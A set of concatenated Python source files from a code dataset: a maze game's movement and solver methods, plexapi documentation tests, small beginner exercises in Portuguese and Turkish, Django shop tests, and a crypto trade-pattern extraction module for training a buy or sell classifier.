and reset each move\n \n Arguements: \n Move -- string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n Single list of 2 integers [1,2]\n \"\"\"\n # current row and column set as new_coordinates to be adjusted according to input \n current_row = self.Player1.col\n current_column = self.Player1.row\n new_coordinates = [current_row,current_column]\n\n # game booleans oob (out of bounds) and incorrect_input are reset to False\n self.oob = False\n self.incorrect_input = False\n \n # if input is illegal - incorrect_input boolean is set to true\n if move != \"w\" and move != \"a\" and move != 's' and move != 'd' and move != 'e' and move != 'q':\n self.incorrect_input = True\n\n # update coordinate based on user input wasdeq\n elif move == 'w':\n if self.Player1.row != 0:\n self.oob=False\n new_coordinates[0] -= 1\n else:\n self.oob = True\n\n elif move == 'a':\n if self.Player1.row != 0:\n self.oob=False\n new_coordinates[1] -= 1\n else:\n self.oob = True\n\n elif move == 's':\n if self.Player1.col != self.Player1.grid_max_width:\n self.oob=False\n new_coordinates[0] += 1\n else:\n self.oob = True\n \n elif move == 'd':\n if self.Player1.row != self.Player1.grid_max_height:\n self.oob=False\n new_coordinates[1] += 1\n else:\n self.oob = True\n\n elif move == 'e':\n self.e_count +=1\n pass\n\n elif move == 'q':\n print()\n print(\"Bye!\")\n sys.exit()\n \n #initial check to ensure coordinates are positive\n if new_coordinates[0] < 0 or new_coordinates[1] < 0:\n self.oob = True\n\n return new_coordinates\n\n\n\n def get_cell_text(self, coordinates):\n \"\"\"Takes in new coordinates for player from game_move \n returns the associated message output from the cell associated with the new coordinates\n \n Arguement: \n coordinates -- list of 2 integers \n\n Returns: \n string: message from cell.message for game output\n \"\"\"\n self.coordinates = coordinates\n row = coordinates[0] \n column = coordinates[1]\n message = self.grid[row][column].message\n return message\n\n\n\n def check_new_coordinates_valid(self, new_coordinates, move):\n \"\"\" checks if the player movement is valid, \n if yes - update player coordinates, moves and move count. \n If not - pass. \n return cell message\n \n Arguements:\n new_coordinates: single list of 2 integers e.g. [1,2]\n move: string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n message -- string variable containing message responding to cell interaction\n \n \"\"\"\n # Check for invalid input\n if self.incorrect_input == True:\n message = 'Please enter a valid move (w, a, s, d, e, q).' + '\\n'\n self.incorrect_input = False\n return message\n\n # Check player not out of bounds\n if self.oob == False:\n\n # Check if move valid and perform step function, \n # Update player coordinates and game moves list\n # return cell message\n if self.check_cell_interaction(new_coordinates, move) == True:\n self.Player1.col = new_coordinates[0]\n self.Player1.row = new_coordinates[1]\n self.total_moves.append(move)\n self.total_moves_count +=1\n message = self.get_cell_text(new_coordinates)\n return message\n\n #If move invalid, check if teleporter, if not, its a wall, return msg\n elif self.check_cell_interaction(new_coordinates, move) == False:\n if self.teleport == True:\n self.total_moves.append(move)\n self.total_moves_count +=1 \n message = self.get_cell_text(new_coordinates)\n return message\n\n # conditionals for if the cell move is invalid / self.oob = out of bounds\n # will create and return a message variable dependent on the specific cell\n else:\n if self.oob == True:\n message = ('You walked into a wall. Oof!' + \"\\n\" )\n self.oob = False\n return message\n\n\n\n\n #SOLVER USE ONLY FUNCTIONS BELOW\n\n\n def check_cell_interaction_solver(self, coordinates, move):\n \"\"\"Checks if a move can be performed by the player.\n Takes new coordinates from game_move and move string from user input\n Runs step_solver_bool() function on destination cell,\n which returns boolean as to whether move can be performed.\n *** Does not perform special cell functions ***\n *** Only used by solver ***\n \n Arguements:\n coordinates -- single list of two integers\n move -- string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input \n \n Returns:\n boolean: True or False if player can move to new cell\n\n \"\"\"\n\n self.teleport = False\n row = coordinates[1] \n column = coordinates[0]\n is_valid_move = self.grid[column][row].step_solver_bool(self)\n return is_valid_move\n\n \n \n def solver_check_new_coordinates_valid_and_move(self, new_coordinates, move):\n \"\"\" checks if the player movement is valid, \n If yes - update player coordinates, moves and move count.\n If not - pass. return cell message\n \n Arguements:\n new_coordinates: single list of 2 integers e.g. [1,2]\n move: string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n boolean -- was move successful? T/F\n \n \"\"\"\n #e_count used to optimize solver - limited to 1 use per map\n if move == 'e':\n self.e_count += 1\n if self.e_count > 1:\n return False\n\n #check for incorrect input\n if self.incorrect_input == True:\n message = 'Please enter a valid move (w, a, s, d, e, q).' + '\\n'\n self.incorrect_input = False\n return False\n\n #check for oob\n if self.oob == False:\n\n #update player position, move count and moves list\n if self.check_cell_interaction(new_coordinates, move) == True:\n self.Player1.col = new_coordinates[0]\n self.Player1.row = new_coordinates[1]\n self.total_moves.append(move)\n self.total_moves_count +=1\n message = self.get_cell_text(new_coordinates)\n return True\n\n #If move invalid, check if teleporter, if not, its a wall, return msg\n elif self.check_cell_interaction(new_coordinates, move) == False:\n if self.teleport == True:\n self.total_moves.append(move)\n self.total_moves_count +=1 \n message = self.get_cell_text(new_coordinates)\n return False\n\n # conditionals for if the cell move is invalid / self.oob = out of bounds\n # will create and return a message variable dependent on the specific cell\n else:\n if self.oob == True:\n message = ('You walked into a wall. Oof!' + \"\\n\" )\n self.oob = False\n return False\n\n\n\n def solver_check_new_coordinates_valid(self, new_coordinates, move):\n \"\"\" checks if the player movement is valid, if yes - returns true. If not - pass.\n \n Arguements:\n new_coordinates: single list of 2 integers e.g. [1,2]\n move: string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input\n\n Returns:\n boolean - is move possible? T/F\n \n \"\"\"\n # E_count - used for solver optimization\n if move == 'e':\n self.e_count += 1\n if self.e_count > 1:\n return False\n\n # Invalid input returns false\n if self.incorrect_input == True:\n message = 'Please enter a valid move (w, a, s, d, e, q).' + '\\n'\n self.incorrect_input = False\n return False\n\n if self.oob == False:\n # Checks if move valid\n if self.check_cell_interaction_solver(new_coordinates, move) == True:\n return True\n\n # Checks if move valid\n if self.check_cell_interaction_solver(new_coordinates, move) == False:\n return False\n\n # Return false if OOB\n else:\n if self.oob == True:\n self.oob = False\n return False \n\n \n def solver_move_and_validate(self, move):\n \"\"\" Solver function to move player \n \n Arguements: move - 'w' 'a' 's' 'd' 'e' 'q'\n \n Returns boolean T/F whether move successful\n \n \"\"\"\n # get new coordinates from game_move\n next_move = self.game_move(move)\n # check if new coordinates are valid and perform move\n return self.solver_check_new_coordinates_valid_and_move(next_move, move)\n\n\n def solver_move_check(self, move):\n \"\"\" Solver function to check if player move legal \n \n Arguements: move - 'w' 'a' 's' 'd' 'e' 'q'\n \n Returns boolean T/F whether move possible\n \n \"\"\"\n\n # get new coordinates from game_move\n next_move = self.game_move(move)\n # check if new coordinates are valid\n return self.solver_check_new_coordinates_valid(next_move, move)\n\n\n def check_cell_teleporter(self, grid1, column, row):\n \"\"\"Checks if cell if a teleporter \n - used for solver optimization of 'wait'\n\n Arguements:\n grid -- list of list of cell instances\n column -- players current column \n \n Returns:\n boolean: True or False if cell is a teleporter\n\n \"\"\"\n if \"Teleport\" in str(grid1[column][row]):\n #update player coordinates to new teleporter\n return True\n\n","repo_name":"JamieMickaill/AcornMazeSolver","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":17000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23950922815","text":"# -*- coding: utf-8 -*-\nimport shlex\nimport subprocess\nfrom os.path import abspath, dirname, join\n\nSKIP_EXAMPLES = [\"Example 4\"]\n\n\ndef test_build_documentation():\n docroot = join(dirname(dirname(abspath(__file__))), \"docs\")\n cmd = shlex.split(\"sphinx-build -aE . _build\")\n proc = subprocess.Popen(\n cmd, cwd=docroot, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n status = proc.wait()\n assert status == 0\n issues = []\n for output in proc.communicate():\n for line in str(output).split(\"\\\\n\"):\n line = line.lower().strip()\n if \"warning\" in line or \"error\" in line or \"traceback\" in line:\n issues.append(line)\n for line in issues:\n print(line)\n assert not issues\n\n\ndef test_readme_examples(plex):\n failed = 0\n examples = _fetch_examples()\n assert len(examples), \"No examples found in README\"\n for title, example in examples:\n if _check_run_example(title):\n try:\n print(f\"\\n{title}\\n{'-' * len(title)}\")\n exec(\"\\n\".join(example))\n except Exception as err:\n failed += 1\n print(f\"Error running test: {title}\\nError: {err}\")\n assert not failed, f\"{failed} examples raised an exception.\"\n\n\ndef _fetch_examples():\n parsing = False\n examples = []\n filepath = join(dirname(dirname(abspath(__file__))), \"README.rst\")\n with open(filepath, \"r\") as handle:\n for line in handle.read().split(\"\\n\"):\n line = line[4:]\n if line.startswith(\"# Example \"):\n parsing = True\n title = line.lstrip(\"# \")\n examples.append([title, []])\n elif parsing and line == \"\":\n parsing = False\n elif parsing:\n examples[-1][1].append(line)\n return examples\n\n\ndef _check_run_example(title):\n for skip_example in SKIP_EXAMPLES:\n if skip_example in title:\n return False\n return True\n","repo_name":"pkkid/python-plexapi","sub_path":"tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":1028,"dataset":"github-code","pt":"81"} +{"seq_id":"16153957990","text":"# Faça um programa que leia três números e mostre qual é o maior e qual é o menor.\na = int(input('Digite um número inteiro:'))\nb = int(input('Digite um outro inteiro diferente:'))\nc = int(input('Digite só mais um número inteiro:'))\nif a > b and a > c:\n maior = a\nif b > c and b > a:\n maior = b\nif c > a and c > a:\n maior = c\nif a < b and a < c:\n menor = a\nif b < c and b < a:\n menor = b\nif c < a and c < b:\n menor = c\nif a < b and a > c:\n medio = a\nif b < c and b > a:\n medio = b\nif c < a and c > b:\n medio = c\nprint('A ordem crescente dos valores é: {}, {} e {}.'.format(menor, medio, maior))\n\n","repo_name":"sauliiin/Python-from-Padawan-to-Jedi","sub_path":"033.py","file_name":"033.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29710269303","text":"\nfrom django.urls import reverse\nfrom django.core import mail\nfrom items.models import Item, FavoriteProduct\nfrom django.urls import reverse\n\n\ndef test_main_page(client, faker, product_factory):\n response = client.get(reverse('about'))\n assert response.status_code == 200\n \n\n data = {\n 'email': faker.email(),\n 'text': faker.sentence()\n }\n response = client.post(reverse('about'), data=data, follow=True)\n assert response.status_code == 200\n assert any(i[0] == reverse('about') for i in response.redirect_chain)\n assert data['email'] in mail.outbox[0].body\n assert data['text'] in mail.outbox[0].body\n\n\n\ndef test_products_list(login_user, product_factory, faker):\n client, user = login_user\n response = client.get(reverse('main'))\n assert response.status_code == 200\n assert not response.context['object_list']\n\n product = product_factory()\n response = client.get(reverse('main'))\n assert response.status_code == 200\n assert len(response.context['object_list']) == 3\n\n response = client.get(reverse('product_detail', args=(faker.uuid4(),)))\n assert response.status_code == 404\n\n response = client.get(reverse('product_detail', args=(str(product.id),)))\n assert response.status_code == 200\n\n\ndef test_add_and_delete_favorites(client, faker, product_factory):\n \n url = reverse('favorites')\n \n data = {\n 'product_uuid': faker.uuid4()\n }\n\n\n response = client.post(reverse('add_or_remove_favorite'), data=data, follow=True)\n assert response.status_code == 200\n assert product_factory in response.context_data['favorites'].items.iterator()\n ","repo_name":"maksimm56m67/Hillel-django-shop","sub_path":"items/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6285633807","text":"import random \n\ndef guess(x):\n random_number = random.randint(1, x)\n guess = 0\n while guess != random_number:\n guess = int(input(f\"1 ile {x} arasında bir tamsayı tahmin ediniz: \"))\n if guess < random_number:\n print(\"Üzgünüm, Tuttuğunuz sayı çok küçük. Tekrar deneyiniz: \")\n elif guess > random_number:\n print(\"Üzgünüm, Tuttuğunuz sayı çok büyük. Tekrar deneyiniz: \")\n\n print(f\"Tebrikler. Doğru tahmin ettiniz, sayımız {random_number}\")\n\nguess(10)","repo_name":"Kadir-Akipek/Python_Projects","sub_path":"Bilgisayarın tuttuğu sayıyı tahmin etme oyunu.py","file_name":"Bilgisayarın tuttuğu sayıyı tahmin etme oyunu.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27397869988","text":"import json\r\nfrom builtins import list\r\nfrom datetime import datetime\r\nimport bisect\r\nimport copy\r\nimport numpy as np\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport MarketStateManager\r\nimport TransactionBasics\r\nimport random\r\n\r\n\r\nPeakFeatureCount = TransactionBasics.PeakFeatureCount\r\npercent = 0.01\r\nIsOneFileOnly = False\r\n\r\n\r\nclass SuddenChangeHandler:\r\n WeirdCount = 0\r\n NormalCount = 0\r\n riseTotalPower = []\r\n fallTotalPower = []\r\n def __init__(self, jsonIn, transactionParam,marketState):\r\n self.marketState = marketState\r\n self.jumpTimeInSeconds = 0\r\n self.reportTimeInSeconds = 0\r\n self.reportPrice = 0.0\r\n self.jumpPrice = 0.0\r\n self.transactions = []\r\n self.maxMinList = []\r\n self.riseList = []\r\n self.timeList = []\r\n self.currencyName = \"\"\r\n self.isRise = False\r\n self.downUpList = []\r\n self.transactionParam = transactionParam\r\n\r\n self.patternList = []\r\n self.mustBuyList = []\r\n self.badPatternList = []\r\n\r\n self.mustSellList = []\r\n self.keepList = []\r\n self.addedCount = 0\r\n\r\n self.jumpState = []\r\n self.__Parse(jsonIn)\r\n\r\n\r\n self.lowestTransaction = TransactionBasics.TransactionCountPerSecBase\r\n self.acceptedTransLimit = TransactionBasics.TransactionLimitPerSecBase\r\n self.dataList = []\r\n tempTransaction = json.loads(jsonIn[\"transactions\"])\r\n if len(tempTransaction) == 0:\r\n return\r\n lastTimeInSeconds = int(tempTransaction[-1][\"T\"]) // 1000\r\n if self.reportTimeInSeconds - lastTimeInSeconds > 1500:\r\n self.jumpTimeInSeconds -= 3600\r\n self.reportTimeInSeconds -= 3600\r\n\r\n self.minIndex = 0\r\n self.maxIndex = 0\r\n self.maxPrice = 0\r\n self.minPrice = 1000\r\n for index in range(len(tempTransaction)):\r\n transaction = tempTransaction[index]\r\n curTimeInSeconds = int(transaction[\"T\"]) // 1000\r\n curPrice = float(transaction[\"p\"])\r\n if curTimeInSeconds < self.jumpTimeInSeconds - 10 or curTimeInSeconds > self.reportTimeInSeconds+10:\r\n continue\r\n if curPrice <= self.minPrice:\r\n self.minPrice = curPrice\r\n self.minIndex = index\r\n self.minTime = curTimeInSeconds\r\n if curPrice >= self.maxPrice:\r\n self.maxPrice = curPrice\r\n self.maxIndex = index\r\n self.maxTime = curTimeInSeconds\r\n\r\n if self.isRise:\r\n self.peakIndex = self.minIndex\r\n else:\r\n self.peakIndex = self.maxIndex\r\n\r\n self.peakTime = int(tempTransaction[self.peakIndex][\"T\"])//1000\r\n self.peakVal = float(tempTransaction[self.peakIndex][\"p\"])\r\n\r\n self.__DivideDataInSeconds(tempTransaction, self.transactionParam.msec, self.dataList, 0, len(tempTransaction)) #populates the dataList with TransactionData\r\n self.__AppendToPatternList(tempTransaction) # deletes dataList and populates mustBuyList, patternList badPatternList\r\n\r\n\r\n def GetFeatures(self):\r\n #return self.downUpList\r\n return TransactionBasics.GetMaxMinList( self.maxMinList )\r\n #return []\r\n #self.timeList[-PeakFeatureCount:] + self.riseList[-PeakFeatureCount:]\r\n #return self.maxMinList + self.timeList[-SuddenChangeHandler.PeakFeatureCount:] + self.riseList[-SuddenChangeHandler.PeakFeatureCount:]\r\n\r\n def __Parse(self, jsonIn):\r\n epoch = datetime.utcfromtimestamp(0)\r\n\r\n self.isRise = bool(jsonIn[\"isRise\"])\r\n self.jumpPrice = float(jsonIn[\"jumpPrice\"])\r\n self.reportPrice = float(jsonIn[\"reportPrice\"])\r\n datetime_object = datetime.strptime(jsonIn[\"reportTime\"].split(\".\")[0], '%Y-%b-%d %H:%M:%S')\r\n self.reportTimeInSeconds = (datetime_object - epoch).total_seconds()\r\n self.riseList = jsonIn[\"riseList\"]\r\n self.timeList = jsonIn[\"timeList\"]\r\n\r\n for i in range(len(self.riseList) - 1 ):\r\n if self.riseList[i]*self.riseList[i+1] > 0.0:\r\n self.riseList.pop(i)\r\n self.timeList.pop(i)\r\n #TransactionBasics.RiseListSanitizer(self.riseList, self.timeList)\r\n\r\n\r\n self.maxMinList = jsonIn[\"maxMin\"]\r\n datetime_object = datetime.strptime(jsonIn[\"time\"].split(\".\")[0], '%Y-%b-%d %H:%M:%S')\r\n self.jumpTimeInSeconds = (datetime_object - epoch).total_seconds()\r\n self.downUpList = jsonIn[\"downUps\"]\r\n self.currencyName = jsonIn[\"name\"]\r\n\r\n def __DivideDataInSeconds(self, jsonIn, msecs, datalist, startIndex, endIndex ):\r\n transactionData = TransactionBasics.TransactionData()\r\n lastEndTime = 0\r\n stopMiliSecs = int(jsonIn[endIndex-1][\"T\"])+1000\r\n for x in range(startIndex,endIndex):\r\n curElement = jsonIn[x]\r\n curMiliSecs = int(curElement[\"T\"])\r\n if x == startIndex:\r\n lastEndTime = curMiliSecs//msecs*msecs + msecs\r\n transactionData.SetTime(curMiliSecs // msecs)\r\n\r\n if curMiliSecs > lastEndTime:\r\n copyData = copy.deepcopy(transactionData)\r\n datalist.append(copyData)\r\n transactionData.Reset()\r\n transactionData.AddData(curElement)\r\n\r\n while True:\r\n if curMiliSecs > (lastEndTime + msecs) and lastEndTime < stopMiliSecs:\r\n emptyData = TransactionBasics.TransactionData()\r\n emptyData.SetTime(lastEndTime // msecs)\r\n emptyData.SetIndex(x)\r\n emptyData.lastPrice = copyData.lastPrice\r\n lastEndTime += msecs\r\n if startIndex == 0:\r\n datalist.append(emptyData)\r\n else:\r\n transactionData.SetTime(curMiliSecs // msecs)\r\n transactionData.SetIndex(x)\r\n lastEndTime += msecs\r\n break\r\n else:\r\n transactionData.AddData(curElement)\r\n transactionData.SetIndex(x)\r\n copyData = copy.deepcopy(transactionData)\r\n datalist.append(copyData)\r\n\r\n def __AppendToPatternList(self, jsonIn):\r\n lenArray = len(self.dataList)\r\n if lenArray == 0:\r\n return\r\n # print(lenArray, self.dataList)\r\n maxTradeVal = 0\r\n for x in range(lenArray):\r\n curTimeInSeconds = self.dataList[x].timeInSecs\r\n if curTimeInSeconds > self.reportTimeInSeconds+10:\r\n continue\r\n lastTotalTradePower = self.dataList[x].totalBuy + self.dataList[x].totalSell\r\n if lastTotalTradePower > maxTradeVal :\r\n maxTradeVal = lastTotalTradePower\r\n self.__AppendToPatternListImpl(self.transactionParam.gramCount, x, lenArray, jsonIn)\r\n if len(self.patternList) == 0:\r\n self.dataList.reverse()\r\n\r\n if len(self.patternList) > TransactionBasics.MaximumSampleSizeFromGoodPattern:\r\n sorted(self.patternList, key=lambda l: l.totalBuy)\r\n self.patternList = self.patternList[-TransactionBasics.MaximumSampleSizeFromGoodPattern:]\r\n\r\n if len(self.badPatternList) > TransactionBasics.MaximumSampleSizeFromPattern:\r\n self.badPatternList = random.sample(self.badPatternList, TransactionBasics.MaximumSampleSizeFromPattern)\r\n\r\n if self.isRise:\r\n SuddenChangeHandler.riseTotalPower.append(maxTradeVal)\r\n else:\r\n SuddenChangeHandler.fallTotalPower.append(maxTradeVal)\r\n\r\n del self.dataList\r\n\r\n def __AppendToPatternListImpl(self, ngramCount, curIndex, lenArray, jsonIn):\r\n totalCount = TransactionBasics.GetTotalPatternCount(ngramCount)\r\n startBin = curIndex + 1 - totalCount\r\n endBin = curIndex + 1\r\n if startBin < 0 or curIndex > lenArray:\r\n return\r\n\r\n curPattern = self.dataList[curIndex]\r\n lastTotalCount = curPattern.transactionBuyCount\r\n # if lastTotalCount < self.lowestTransaction:\r\n # return\r\n\r\n if curPattern.totalBuy < 0.1:\r\n return\r\n\r\n # if self.dataList[curIndex].totalSell > 0.5:\r\n # return\r\n #\r\n #if self.isRise:\r\n # print(\"Analyzing rise\")\r\n pattern = TransactionBasics.TransactionPattern()\r\n copyList = copy.deepcopy(self.dataList[startBin:endBin])\r\n dataRange = TransactionBasics.ReduceToNGrams(copyList, ngramCount)\r\n #\r\n #if dataRange[0].totalTransactionCount < 0.1:\r\n # return\r\n # #\r\n\r\n if dataRange[0].transactionBuyCount < 0.09 or dataRange[0].transactionBuyCount > 1.2:\r\n return\r\n\r\n if dataRange[0].totalBuy < 0.0005 or dataRange[0].totalBuy > 0.012:\r\n return\r\n\r\n if dataRange[0].totalSell < 0.0002 or dataRange[0].totalSell > 0.008:\r\n return\r\n\r\n if dataRange[1].transactionBuyCount < 0.16 or dataRange[1].transactionBuyCount > 2.05:\r\n return\r\n\r\n if dataRange[1].totalBuy < 0.0012 or dataRange[1].totalBuy > 0.023:\r\n return\r\n\r\n if dataRange[1].totalSell < 0.00035 or dataRange[1].totalSell > 0.015:\r\n return\r\n\r\n if dataRange[2].transactionBuyCount < 0.45 or dataRange[2].transactionBuyCount > 3.02:\r\n return\r\n\r\n if dataRange[2].totalBuy < 0.003 or dataRange[2].totalBuy > 0.023:\r\n return\r\n\r\n if dataRange[2].totalSell < 0.00013 or dataRange[2].totalSell > 0.017:\r\n return\r\n\r\n\r\n # #\r\n # if dataRange[1].totalBuy < 0.0016:\r\n # return\r\n #\r\n # if dataRange[1].totalSell > 0.01 and dataRange[1].totalSell > dataRange[1].totalBuy:\r\n # return\r\n # elif dataRange[1].totalSell > 0.02:\r\n # return\r\n #\r\n # if dataRange[0].totalSell > 0.005 and dataRange[0].totalSell > dataRange[0].totalBuy:\r\n # return\r\n # elif dataRange[0].totalSell > 0.01:\r\n # return\r\n #\r\n #\r\n # if dataRange[-1].totalSell > 0.01 and dataRange[-1].totalSell > dataRange[-1].totalBuy:\r\n # return\r\n # elif dataRange[-1].totalSell > 0.1:\r\n # return\r\n # #\r\n # # if dataRange[1].totalBuy/dataRange[0].totalBuy > 6.0:\r\n # # return\r\n #\r\n if dataRange[0].transactionBuyCount > 0.0 and dataRange[-1].transactionBuyCount/dataRange[0].transactionBuyCount < 2.0:\r\n return\r\n # #\r\n if dataRange[0].totalBuy > 0.0 and dataRange[-1].totalBuy/dataRange[0].totalBuy < 7.0:\r\n return\r\n\r\n\r\n # if dataRange[0].totalBuy > 0.0 and dataRange[1].totalBuy/dataRange[0].totalBuy < 0.35:\r\n # return\r\n #\r\n # if dataRange[0].totalBuy > 0.0 and dataRange[2].totalBuy/dataRange[0].totalBuy < 0.35:\r\n # return\r\n\r\n if dataRange[0].firstPrice != 0.0:\r\n firstRatio = dataRange[0].lastPrice / dataRange[0].firstPrice\r\n if firstRatio < 1.004 or firstRatio > 1.055:\r\n return\r\n\r\n if dataRange[1].firstPrice != 0.0:\r\n firstRatio = dataRange[1].lastPrice / dataRange[1].firstPrice\r\n if firstRatio < 0.994 or firstRatio > 1.02:\r\n return\r\n\r\n if dataRange[2].firstPrice != 0.0:\r\n firstRatio = dataRange[2].lastPrice / dataRange[2].firstPrice\r\n if firstRatio < 0.99 or firstRatio > 1.016:\r\n return\r\n\r\n firstRatio = dataRange[-1].lastPrice / dataRange[-1].firstPrice\r\n if firstRatio < 0.998 or firstRatio > 1.01:\r\n return\r\n\r\n\r\n\r\n detailDataList = []\r\n self.__DivideDataInSeconds(jsonIn, 100, detailDataList, curPattern.startIndex-1, curPattern.endIndex+1)\r\n pattern.SetDetailedTransaction(detailDataList, dataRange)\r\n if pattern.maxDetailBuyPower < 0.045 or pattern.maxDetailBuyPower > 2.0:\r\n return\r\n\r\n basePrice = self.dataList[curIndex].lastPrice\r\n baseIndex = 0\r\n curIndexDetail = 0\r\n for detailPattern in detailDataList:\r\n if baseIndex == 0 and detailPattern.totalBuy > self.acceptedTransLimit:\r\n basePrice = detailPattern.lastPrice\r\n baseIndex = curIndexDetail\r\n curIndexDetail += 1\r\n\r\n totalSellCount = 0\r\n totalSellPower = 0.0\r\n for index in range(baseIndex+1, len(detailDataList)):\r\n totalSellPower += detailDataList[index].totalSell\r\n totalSellCount += (detailDataList[index].totalTransactionCount - detailDataList[index].transactionBuyCount)\r\n pattern.detailedHighestSellCountNumber = totalSellCount\r\n # if totalSellPower > 0.05:\r\n # return\r\n\r\n # if not pattern.isMaxBuyLater:\r\n # return\r\n if pattern.detailLen < 2:\r\n return\r\n #if self.timeList[-1] < 15:\r\n # return\r\n\r\n\r\n ratio = basePrice/self.jumpPrice\r\n curTimeDiff = (self.dataList[curIndex].timeInSecs - self.jumpTimeInSeconds)//60\r\n pattern.timeToJump = self.reportTimeInSeconds - self.dataList[curIndex].timeInSecs\r\n pattern.SetPeaks(self.riseList, self.timeList, ratio, curTimeDiff)\r\n\r\n if pattern.totalPeakCount15M > 2.0:\r\n return\r\n if pattern.totalPeakCount1Hour > 5.0:\r\n return\r\n # if pattern.lastUpRatio < -1.0:\r\n # return\r\n #\r\n # if pattern.peaks[-1] < 0.0 and pattern.lastDownRatio < -1.0:\r\n # return\r\n\r\n reverseRatio = 1/ratio\r\n if self.maxMinList[0] * reverseRatio < 0.75 or self.maxMinList[0] * reverseRatio > 0.98:\r\n return\r\n\r\n if self.maxMinList[2] * reverseRatio < 0.65 or self.maxMinList[4] * reverseRatio < 0.55:\r\n return\r\n\r\n\r\n moreDetailDataList = []\r\n self.__DivideDataInSeconds(jsonIn, 1, moreDetailDataList, self.dataList[curIndex].startIndex, self.dataList[curIndex].endIndex+1)\r\n pattern.SetDetailedTransaction(moreDetailDataList, dataRange)\r\n # if pattern.detailLen < 5:\r\n # return\r\n\r\n pattern.Append( dataRange, self.jumpTimeInSeconds, self.jumpPrice, self.marketState)\r\n\r\n #print(pattern.marketStateList)\r\n category = self.__GetCategory(curIndex,basePrice,pattern)\r\n if category == 0:\r\n self.mustBuyList.append(pattern)\r\n elif category == 1:\r\n self.addedCount += 1\r\n self.patternList.append(pattern)\r\n elif category == 2:\r\n self.badPatternList.append(pattern)\r\n self.addedCount += 1\r\n\r\n def __GetCategory(self, curIndex, priceIn, pattern):\r\n if self.isRise:\r\n if priceIn < self.reportPrice * 0.97:\r\n for i in range(curIndex+1, len(self.dataList)):\r\n ratio = self.dataList[i].lastPrice / priceIn\r\n timeDiff = self.dataList[i].endIndex - self.dataList[curIndex].endIndex\r\n #pattern.UpdatePrice(timeDiff, ratio)\r\n if ratio<0.98:\r\n return -1\r\n if ratio>1.03:\r\n #pattern.GoalReached(timeDiff, 1.03)\r\n return 1\r\n return -1\r\n else:\r\n for i in range(curIndex, len(self.dataList)):\r\n if self.dataList[i].lastPrice/priceIn<0.98:\r\n return 2\r\n if self.dataList[i].lastPrice/priceIn>1.03:\r\n return -1\r\n return 2\r\n\r\n return -1\r\n\r\n def __GetCategorySell(self, curIndex):\r\n price = self.dataList[curIndex].lastPrice\r\n minVal = self.dataList[curIndex].minPrice\r\n maxVal = self.dataList[curIndex].maxPrice\r\n time = self.dataList[curIndex].timeInSecs\r\n\r\n if self.isRise:\r\n if minVal < self.peakVal * 1.03:\r\n return 2 # We can keep\r\n\r\n else:\r\n if maxVal > self.peakVal * 0.995:\r\n return 1 # We need to sell now\r\n return -1\r\n\r\nclass SuddenChangeMerger:\r\n\r\n def __init__(self, transactionParam, marketState):\r\n self.mustBuyList = []\r\n self.patternList = []\r\n self.badPatternList = []\r\n\r\n self.mustSellList = []\r\n self.keepList = []\r\n\r\n self.handlerList = []\r\n self.peakHelperList = []\r\n self.transactionParam = transactionParam\r\n self.marketState = marketState\r\n\r\n def AddFile(self, jsonIn):\r\n for index in range(len(jsonIn)):\r\n if not jsonIn[index]:\r\n continue\r\n\r\n jsonPeakTrans = jsonIn[index]\r\n\r\n handler = SuddenChangeHandler(jsonPeakTrans,self.transactionParam,self.marketState)\r\n self.handlerList.append(handler)\r\n\r\n def Finalize(self):\r\n for peak in self.handlerList:\r\n self.__MergeInTransactions(peak)\r\n del peak\r\n self.Print()\r\n\r\n def toTransactionFeaturesNumpy(self):\r\n badCount = len(self.badPatternList)\r\n goodCount = len(self.patternList)\r\n #self.Print()\r\n #mustBuyCount = len(self.mustBuyList)\r\n print(\"Good count: \", goodCount, \" Bad Count: \", badCount)\r\n\r\n allData = np.concatenate( (self.patternList, self.badPatternList), axis=0)\r\n return allData\r\n\r\n def toTransactionResultsNumpy(self):\r\n badCount = len(self.badPatternList)\r\n goodCount = len(self.patternList)\r\n #mustBuyCount = len(self.mustBuyList)\r\n print(\"Good count: \", goodCount, \" Bad Count: \", badCount)\r\n #mustBuyResult = [2] * mustBuyCount\r\n goodResult = [1] * goodCount\r\n badResult = [0] * badCount\r\n returnPatternList = goodResult + badResult\r\n return returnPatternList\r\n\r\n def toSellTransactions(self):\r\n mustSellCount = len(self.mustSellList)\r\n keepCount = len(self.keepList)\r\n #self.Print()\r\n #mustBuyCount = len(self.mustBuyList)\r\n allData = np.concatenate( (self.mustSellList, self.keepList), axis=0)\r\n #print(allData)\r\n print(\"Must sell count: \", mustSellCount, \" Keep count: \", keepCount)\r\n return allData\r\n\r\n def toSellResultsNumpy(self):\r\n mustSellCount = len(self.mustSellList)\r\n keepCount = len(self.keepList)\r\n\r\n print(\"Must sell count: \", mustSellCount, \" Keep count: \", keepCount)\r\n mustSellResult = [0] * keepCount\r\n keepResult = [1] * mustSellCount\r\n returnPatternList = mustSellResult + keepResult\r\n return returnPatternList\r\n\r\n def Print(self):\r\n\r\n #mustBuyList = np.array(self.mustBuyList)\r\n buyList = np.array(self.patternList)\r\n badList = np.array(self.badPatternList)\r\n\r\n for i in range(len(self.patternList[0])):\r\n # a = {'Good': buyList[:, i],\r\n # 'Bad': badList[:, i]}\r\n #df = pd.DataFrame.from_dict( a, orient='index')\r\n #df = df.transpose()\r\n #df.plot.box()\r\n #mustBuyLegend = str(np.quantile(mustBuyList[:, i], 0.1)) + \",\" + str(np.quantile(mustBuyList[:, i], 0.5)) 